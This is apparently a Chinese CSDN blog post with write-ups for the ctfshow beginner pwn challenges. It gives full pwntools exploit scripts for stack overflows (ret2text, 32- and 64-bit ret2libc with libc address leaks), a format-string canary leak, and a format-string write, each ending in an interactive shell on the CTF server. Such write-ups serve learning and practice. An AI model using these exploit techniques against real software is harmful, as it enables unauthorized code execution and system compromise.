ctfshow 基础pwn wp

最新推荐文章于 2024-06-23 18:50:21 发布
最新推荐文章于 2024-06-23 18:50:21 发布
阅读量713 收藏
点赞数
分类专栏: pwn 文章标签: 堆栈
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xshower/article/details/117376279
版权
一系列关于栈溢出利用的CTF挑战解析,包括ret2text、ret2libc等技术。通过远程连接到服务器,发送特定payload来控制程序执行流程,泄露内存地址,最终实现权限提升。涉及知识点有栈溢出的偏移计算、libc库函数地址查找等。
摘要由CSDN通过智能技术生成

PWN01

简单栈溢出,ret2text

from pwn import *
#p = process("./pwn1")
p = remote(ip,port)
p.recv()
payload = 'a'*(0x9+4) + p32(0x0804850F)
p.sendline(payload)
p.interactive()

PWN03

32为程序,栈溢出,无system,ret2libc,32位程序通过栈传参

from pwn import *
from LibcSearcher import *

p=remote("pwn.challenge.ctf.show",28051)    
#p=process("./stack1")
elf=ELF("./stack1")


puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]

main_addr=0x80484BB


payload1='a'*(9+4)+p32(puts_plt)+p32(main_addr)+p32(puts_got)

p.sendline(payload1)

p.recvuntil("\n\n")                
puts_addr=u32(p.recv(4))
print(hex(puts_addr))
#puts_addr=0xc0a0
lib=LibcSearcher("puts",puts_addr)

lib_base=puts_addr-lib.dump("puts")
system_addr=lib_base+lib.dump("system")
binsh_addr=lib_base+lib.dump("str_bin_sh")

payload2='a'*(9+4)+p32(system_addr)+'aaaa'+p32(binsh_addr)

p.sendline(payload2)                                                
p.interactive()

PWN04

存在canary,格式化字符串漏洞,通过格式化字符串漏洞泄露canary,在构造栈溢出
首先确定输入的偏移为6
canary和buf的距离为(0x70-0xc)=0x64=100
确定canary的偏移为100/4+6=31

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'

#p = process('./ex2')
p = remote('pwn.challenge.ctf.show',28048)

payload='%31$x'
p.recvuntil("Hello Hacker!\n")
p.sendline(payload)

canary=int(p.recv(),16)
shell=0x804859B
payload2='a'*(0x70-0xc)+p32(canary)+'a'*0xc+p32(shell)

p.sendline(payload2)
p.interactive()

PWN05

简单栈溢出,ret2text

from pwn import *
#from LibcSearcher import *
context.log_level = 'debug'

#p = process('./ex2')
p = remote('pwn.challenge.ctf.show',28010)

payload='a'*(0x14+4)+p32(0x8048486)

p.sendline(payload)
p.interactive()

PWN06

简单栈溢出,ret2text,注意18位ubuntu需要栈对齐

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'

#p = process('./ex2')
p = remote('pwn.challenge.ctf.show',28081)

payload='a'*(0xc+8)+p64(0x40057B)

p.sendline(payload)
p.interactive()

PWN07

ret2libc,64位程序先通过rdi等6个寄存器传参,多的通过栈传参

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
p=remote("pwn.challenge.ctf.show",28094)    
#p=process("./pwn")
elf=ELF("./pwn")

puts_plt=elf.plt["puts"]
puts_got=elf.got["puts"]

main_addr=elf.sym["main"]

rdi_addr=0x4006e3
ret_addr=0x4004c6

payload1='a'*(0xc+8)+p64(rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)

p.sendline(payload1)

p.recvuntil("\n")               
puts_addr= u64(p.recvuntil(b"\n",drop=True).ljust(8,b"\x00"))
print(hex(puts_addr))
lib=LibcSearcher("puts",puts_addr)
lib_base=puts_addr-lib.dump("puts")
system_addr=lib_base+lib.dump("system")
binsh_addr=lib_base+lib.dump("str_bin_sh")

payload2='a'*(0xc+8)+p64(ret_addr)+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)

p.sendline(payload2)                                                
p.interactive()

01栈溢出之ret2text

简单ret2text,注意栈对齐

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'

#p = process('./ex2')
p = remote('pwn.challenge.ctf.show',28097)

payload='a'*(0x80+8)+p64(0x40063B)

p.sendline(payload)
p.interactive()

PWN10

格式化字符串漏洞,偏移为7

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'

#p = process('./ex2')
p = remote('pwn.challenge.ctf.show',28067)

payload=p32(0x804A030)+'a'*0xc+'%7$n'

p.sendline(payload)
p.interactive()
N1ptune__
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFSHOW 36D杯CTF(pwn部分wp
weixin_44296844的博客
05-04 1792
PWN WP 感谢1p0ch师傅 最近参加了ctf.show举办的一个比赛,做了一下pwn题,以下是我的一些wp,由于本人能力有限,菜的一批,如果有什么不对的地方,请多包含。 PWN_签到 签到题直接nc上去以后发现考察的是linux的基本操作,程序过滤掉了空格,cat,但是我们可以ls查看 more<flag 这里<可以绕过空格 PWN_babyFmts...
ctfshow pwn
zip471642048的博客
06-04 464
ctfshow pwn系列
Pwn刷题记录(不停更新)
最新发布
qq_66013948的博客
06-23 334
​ 发现了个事儿,for循环会执行两次,所以这里采用第一次不溢出,通过格式化字符串漏洞对Canary的值进行泄露,之后就可以在合适的地方填入canary的值来绕过canary保护了。​ 之后就是具体进行溢出了,计算溢出的长度也比较简单,这里直接上答案吧,116字节,不过,第100到104为canary的值。​ 根据这俩进行计算,可得到偏移,结果是0x7c/4=31。​ 除了NX之外,似乎就只有 Canary了。​ 因此,思路就很明确了。
CTFshow——Pwn(1)
Y_peak的博客
02-24 399
CTFshow——Pwn(1) 有点懒不想写write up了。只有exploit。 PWN签到题 from pwn import * p = remote('xxx',xxx) p.interactive() pwn02 from pwn import * p =remote("pwn.chall.ctf.show",28006) p.sendline('a'*(0x9+4) + p32(0x0804850F)) p.interactive() pwn03 from pwn import * from
CTFshow-pwn入门-前置基础pwn5 - pwn12
T1ngSh0w的博客
06-17 1195
CTFshow-pwn入门-前置基础-pwn5-pwn12
CTFshow-pwn入门-前置基础pwn29-pwn31
T1ngSh0w的博客
06-21 1538
CTFshow-pwn入门-前置基础pwn29-pwn31(绕过PIE-pwn31)
pwn的一些基础.pdf
04-02
pwn入门的一些基础
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
2024NKCTF-pwn
03-25
2024NKCTF_pwn
ciscn-2019-pwn
11-29
1. **baby_pwn** - 这个名字通常用于新手级别的Pwn题目,"baby"意味着它相对简单,是初学者学习基础漏洞利用技术的入门级挑战。 2. **bms** - 可能代表“Building Management System”,是一个模拟建筑管理系统的...
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
CTFshow-pwn入门-前置基础pwn13-pwn19
T1ngSh0w的博客
06-17 1925
ctfshow pwn入门-前置基础pwn13-pwn19
Ctfshow pwn 02(自己做出的第一道pwn题)
weixin_64875092的博客
12-05 5304
算是一篇第一次做出pwn题的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在做题时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
CTFSHOW|pwn-数学99-wp
l2645470582_的博客
11-08 694
1.检查保护机制 2.我们用64位的IDA打开该文件 查找关键字符串看到有“cat flag” 3.我们先预览一遍程序 main函数 我们看到要if语句里面的三个函数条件为真 第一个函数 第二个函数 第三个函数 在第三个函数里面条件为真就可以拿到flag(handler) 4.第一个函数:sub_9C0() 条件: 因为输入变量s是有符号数的int型:0~2147483647 -2147483648~-1 所以8 -(-...
CTFshow-PWN-溢出(pwn40)
Welcome To Myon'Blog !
04-24 746
在64位的Linux系统中,参数传递是通过寄存器来完成的,而 system 函数的第一个参数(即需要执行的命令字符串)是通过 rdi 寄存器传递的,所以,我们首先需要将 /bin/sh 字符串的地址放入 rdi 寄存器中,然后才能调用system函数,这就是为什么我们需要知道 pop rdi;--only "pop|ret": 指定了只查找包含"pop"和"ret"指令序列的代码片段,这些指令通常用于弹出寄存器中的值,并将控制流返回到调用函数的地址处,是ROP攻击中常用的gadgets。
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 6002
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
ctfshow-pwn新手系列
ro4lsc的博客
06-14 9506
前言 十几天没发文了,都在写这篇文章,我也不知道为啥我要学pwn,当初是准备学汇编的,走上了不归之路,呜呜呜 pwn签到题 nc 连上就有flag pwn02 一个简单的ret2text 首先看main函数 那么接着跟到pwnme函数 可以看到buf只有9个字节 而fgets读入了50个字节,所以就导致了溢出 这是个32位的程序所以ret地址一般是ebp+4 看到stack函数 地址 故exp为 exp: from pwn import * #p = process("./pwn1") p
Pwnwp
weixin_52553215的博客
11-22 725
如%100×10$n 表示将 0x64 写入偏移 10 处保存的指针所指向的地址(4字节),而$hn 表示写入的地址空间为 2 字节,$hhn 表示写入的地址空间为 1字节,%$lln 表示写入的地址空间为 8 字节,在 32bit 和 64bit 环境下一样。猜测 0x40060d 这个地址是个函数,运行这个函数可以直接拿到 flag,那我们只需要去不断的填充垃圾数据,然后在后面加个给的地址(也可能是不加,分情况讨论),不断尝试,直到把这个地址填充到返回地址的位置。
ctfshow的pwn2
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值